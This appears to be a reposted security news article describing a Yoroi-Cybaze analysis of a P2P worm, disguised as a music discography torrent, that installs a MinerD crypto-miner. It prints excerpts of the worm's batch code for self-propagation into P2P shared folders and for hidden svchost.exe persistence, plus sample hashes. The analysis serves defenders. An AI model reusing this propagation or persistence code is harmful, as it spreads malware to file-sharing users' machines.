Experts spotted P2P worm spreading Crypto-Miners in the wild

Malware researchers at Yoroi-Cybaze Z-Lab have discovered a P2P worm that is spreading Crypto-Miners in the wild.


In the past months we published a white paper exploring the risks that users can encounter when downloading materials from P2P sharing network, such as the Torrent one. We discussed how crooks easily lure their victims to download malware along with the desired content. Recently, our threat monitoring operations pointed us to an interesting file named “Lucio Dalla Discografia Completa”: this file pretends to be a collection of the discography of a  famous Italian singer, but it actually hides malicious intents. 

For this reason, Cybaze-Yoroi ZLAB dissected this malware threat revealing its hidden virulent nature. 

Technical Analysis 

As anticipated, the file downloaded from the BitTorrent network is an executable. A quick recon revealed it actually is an SFX archive containing several other files. 

Hashf9b2e61200addf760d7bd157c73201e97257b12d5177837a1bffb98f4064e76aThreatMiner-DropperBrief DescriptionCoin-miner dropper (SFX archive)Ssdeep98304:BbEwGxyUOn/JaYYaeY+dM6YydmOQ1zYuuUBb53+munE0dMp1oHnXZetvRfuODYNTable 1: Static Information about the miner dropper

The usage of an archive like SFX allows the attacker to hide the content of the malicious PE and significantly reduce the detection rate. Opening the sample with a common archive manager like WinRAR or 7z, unveil its content. 

Figure 1: Content of the SFX fileThe archive contains more than a dozen of files. In detail it embeds:

16 temporary files used during execution;a Visual Basic Script;a batch script;and a setup fileOn the right of Figure 1 it is possible to see the SFX configuration file. After the auto-extraction, the first file run is “run.vbs”. Its content is minimal and quickly redirect the execution to a small batch file, “installer.bat” contained in the same folder. Then it runs installer.bat (the filename) with the parameter “0″ (WindowStyle hidden, to avoid hidden windows because it may trigger AntiViruses heuristics) and “true” (WaitOnReturn).

The content of “installer.bat” file is also minimal and points to a more complex text file “007.tmp”, later renamed as “007.bat”. That file weighs over 59 KB and contains more interesting functionalities.

Unlike the previous script, the “007” file performs many operations. The first one is to copy of all files contained in the extraction path directory into “#” subdirectory and to rename some of the just extracted files, suggesting some of the files are dependencies of a more complex chain.

@echo off & setlocal enabledelayedexpansionset CURRDIR=%~dp0md #copy “%CURRDIR%/002.tmp” “%CURRDIR%/#/002.tmp”copy “%CURRDIR%/003.tmp” “%CURRDIR%/#/003.tmp”copy “%CURRDIR%/004.tmp” “%CURRDIR%/#/004.tmp”copy “%CURRDIR%/005.tmp” “%CURRDIR%/#/005.tmp”copy “%CURRDIR%/006.tmp” “%CURRDIR%/#/006.tmp”copy “%CURRDIR%/007.tmp” “%CURRDIR%/#/007.tmp”copy “%CURRDIR%/008.tmp” “%CURRDIR%/#/008.tmp”copy “%CURRDIR%/010.tmp” “%CURRDIR%/#/010.tmp”copy “%CURRDIR%/011.tmp” “%CURRDIR%/#/011.tmp”copy “%CURRDIR%/013.tmp” “%CURRDIR%/#/013.tmp”copy “%CURRDIR%/014.tmp” “%CURRDIR%/#/014.tmp”copy “%CURRDIR%/016.tmp” “%CURRDIR%/#/016.tmp”copy “%CURRDIR%/installer.bat” “%CURRDIR%/#/installer.bat”copy “%CURRDIR%/run.vbs” “%CURRDIR%/#/run.vbs”copy “%CURRDIR%/002.tmp” “%CURRDIR%/7z.exe”copy “%CURRDIR%/003.tmp” “%CURRDIR%/7z.dll”copy “%CURRDIR%/004.tmp” “%CURRDIR%/Default.SFX”copy “%CURRDIR%/005.tmp” “%CURRDIR%/Rar.exe”copy “%CURRDIR%/006.tmp” “%CURRDIR%/sfx.confCode Snippet 1: Copy of the files in a subfolder

After that, it generates three different files named “001.tmp”, “32.tmp” and “64.tmp”, later renamed with “.exe” suffix. They are created by mixing up the original files. In particular: “001.tmp” is created combining file “008.tmp”, “009.tmp” and “010.tmp”. The resulting executable have been split in those files, evading AV signatures. 

But this composed executable hides another interesting detail. Before merging the file slices, the script replaces part of the PE header: it overrides the “This program cannot be run in DOS mode” string with random chars, generating different files hashes at every infection. This polymorphic techniques implemented directly in bash stage is applied to all the other files chunked and embedded into the original SFX archive.

Figure 2: Generation of the custom DOS headerAfter that, the script tries to use the just created “Rar.exe” and “7z.exe” files to create new SFX file in other directories belonging to the P2P platforms. This trick is used to spread the attack across the file-sharing communities, to compromise much more victims and to keep the infection alive. An example of this routine is the following:

for /d /r “c:” %%a in (preferences.ini) do (if exist “%%a” (for /f %%b in (‘findstr /c:”IncomingDir=” “%%a”‘) do (set “var=%%b”for %%c in (“!var:~12!*.*”) do (ECHO ERRO %random%%random%%random%%random%%random%%random%%random%%random%%random%%random% > “%CURRDIR%#setup”rar a -r -sfx -m5 -ep1 -zsfx.conf “%%~nc”.exe #*7z a -tzip -mx=0 “%%~nc”.zip “%%~nc”.exedel “%%~nc”.exedel “%%c”move “” “!var:~12!” ))))[…]for /d /r “c:” %%a in (*) do (if /i “%%~nxa”==”my grokster” (set “var=%%a” (for %%c in (“!var!*.*”) do (ECHO ERRO %random%%random%%random%%random%%random%%random%%random%%random%%random%%random% > “%CURRDIR%#setup”rar a -r -sfx -m5 -ep1 -zsfx.conf “%%~nc”.exe #*7z a -tzip -mx=0 “%%~nc”.zip “%%~nc”.exedel “%%~nc”.exedel “%%c”move “” “!var!” ))))Code Snippet 2: Example of propagation routine

All these actions are performed for each system drive letter, such as C:, D:, X: and so on. After that, the script looks for the Microsoft Windows OS version from “5.x” to “15.x” and finally executes several specific routines according to the target machine. These routines perform a few basic operations:

Create a new directory in “%systemdriveAppCachex86%” and immediately hide it; Copy the file “001.tmp” in the Startup Folder (for every OS language) renaming it as “svchost.exe” and the file 32/64.tmp in “AppCachex86”;Execute “001.exe” file. :win7if defined PROGRAMFILES(X86) (goto x64) else (goto x86):x64mkdir %systemdrive%AppCachex86attrib +s +h %systemdrive%AppCachex86attrib +s +h %systemdrive%AppCachecopy /y “%CURRDIR%01.tmp” “%AppData%MicrosoftWindowsStart MenuProgramsStartupsvchost.exe”copy /y “%CURRDIR%01.tmp” “%systemdrive%users%username%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartUpsvchost.exe”[…]copy /y “%CURRDIR%64.tmp” “%systemdrive%AppCachex86svchost.exe”attrib +h “%systemdrive%AppCachex86svchost.exe”“%AppData%MicrosoftWindowsStart MenuProgramsStartupsvchost.exe”“%systemdrive%users%username%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartUpsvchost.exe”[…]goto endCode Snippet 3: Choose of the files to copy whether the target architecture is x86 or x64

At this point, the malicious control passes to the 001.exe file located in the Startup folder.

Figure 3: UPX signature evidenceThe 001 File

The 001.exe is actually packed with a known version of the UPX compressor. So, the extraction of the payload is quite straight forward.

Hashb6080b2786d2e4ac30207fb2f177046cfd40fa6578c56f3dfd13abab7d62e2eaThreatMiner LauncherBrief DescriptionCoin-miner Payload (001.exe) packed with UPXSsdeep3072:A3VD85gJFV8QncMujKCv0jqAi0hIazLEHYxWVfhn+zM45uUyvHBsV2svkgfODQ2CTable 2: Generic info about the Miner Loader

Hash7bd25bd3c0f003ffea67c846b4fefd8fb8b4f72d836544d0ef786c5c6c63b422ThreatMiner Launcher DecompressedBrief DescriptionCoin-miner Payload (001.exe) unpackedSsdeep12288:7EyxWjS8ZZVajy6YWgHQ+oHxlJz4UE0UsZ+GmYNuuv:oyxWjS8ZZVUYWgw1HhTable 3: Generic info about the Miner Loader unpacked

Analyzing the decompressed binary, we noticed the malware firstly tries to run the “svchost.exe” binary contained in “%systemdrive%AppCachex86”, which likely is the real payload.

Figure 4: Evicends of the mining routineThe Payload

Hash73bc41504045e4e6de1b63ec40433afabf316141b1289c69905ee946e1b1a263ThreatMiner-PayloadBrief DescriptionCoin-miner Payload (32.exe) packed with UPX (minerd)Ssdeep73bc41504045e4e6de1b63ec40433afabf316141b1289c69905ee946e1b1a263Table 4: Generic Information of the Coininer compiled in 32 bit (UPX packed)

Hasha3574e73234e18be8d233c9e3fa3819600fc40341d8be8fc4449e4e73632ad6dThreatMiner-PayloadBrief DescriptionCoin-miner Payload (64.exe) packed with UPX (minerd)Ssdeep49152:sb5CY+muocuUwlCdMsQd1pSHn/5JKIezmMNkG7403EIlnDysnue759ByzPIYNUNTable 5: Generic Information of the Coininer compiled in 32 bit (UPX unpacked)

The “svchost.exe” placed in the file “%systemdrive%AppCachex86” folder actually is one of the two files “32.exe” and “64.exe” previously created.  After unpacking routines, the results are the following.

Hash746d17e8d0b961f0c7733f155152fa54d2610fc6d117217d24f32d3ad370075eThreatMiner-PayloadBrief DescriptionCoin-miner Payload (32.exe) unpacked (minerd)Ssdeep196608:aN8/juE4Be73AeWNEwVGuhcf7eVhbjYV:tuwUbKTable 6: Generic Information of the Coininer compiled in 64 bit (UPX packed)

Hash552a4cbd2628d16d1fc910c9fc24bc426cafdf0f755f7b4013484adbc0393ca7ThreatMiner-PayloadBrief DescriptionCoin-miner Payload (64.exe) unpacked(minerd)Ssdeep393216:6ovgtbTTTpT1TITHThTtTwTaTtTVTFTZTlTNTbTwTuTzT1T0TtTlT1ToTlTzTVTz:6Table 7: Generic Information of the Coininer compiled in 64 bit (UPX packed)

Obviously, these hashes changes at every infection due to the polymorphic technique implemented in the bash stage previously described. The unique purpose of “001.exe” is the execution of “32.exe” or “64.exe” contained in “%systemdrive%AppCachex86”, a stratum-based coinminer. Stratum is the de-facto standard protocol used by crypto-miners to connect to mining pools. 

Figure 5: Connection routine to the mining serverExploring the sample we notice that it actually is “MinerD”, an open-source cryptomining software publicly available on GitHub. 

Figure 6: Comparison between the payloads (on the left) and the GitHub project (on the right)Conclusion

This malware threat reminds us of the hidden risks of downloading material through p2p networks, along with the tricks adopted by the crooks to keep the campaign running in the wild. Indeed, this sample is able to survive across multiple p2p network by propagating to p2p shared folders configured into the victim machine, ensuring a good level of resilience from the attacker point of view.  Also, the attackers implemented polymorphic trick directly in batch language, replacing of part of the PE file header to create unique samples on each infection .

A naive or a distracted user can be lured to download infected media contents with the promise to ear his favorite musician, but this action can be compromise the machine of the victim and feed the cyber-criminals behind this campaign. This time, the consequences of such lack of awareness are quite contained, the final payload is actually a crypto-miner and the user may only experience delays or crashes, but what if the payload contains a bot a RAT, or even a ransomware? The consequences could be more serious.

Technical details, including IoCs and Yara Rules, are available in the analysis published in the Yoroi blog.

window._mNHandle = window._mNHandle || {};
window._mNHandle.queue = window._mNHandle.queue || [];
medianet_versionId = “3121199”;

try {
window._mNHandle.queue.push(function () {
window._mNDetails.loadTag(“762221962”, “300×250”, “762221962”);
catch (error) {}

Pierluigi Paganini

(SecurityAffairs – crypto-miners, P2P worm)

The post Experts spotted P2P worm spreading Crypto-Miners in the wild appeared first on Security Affairs.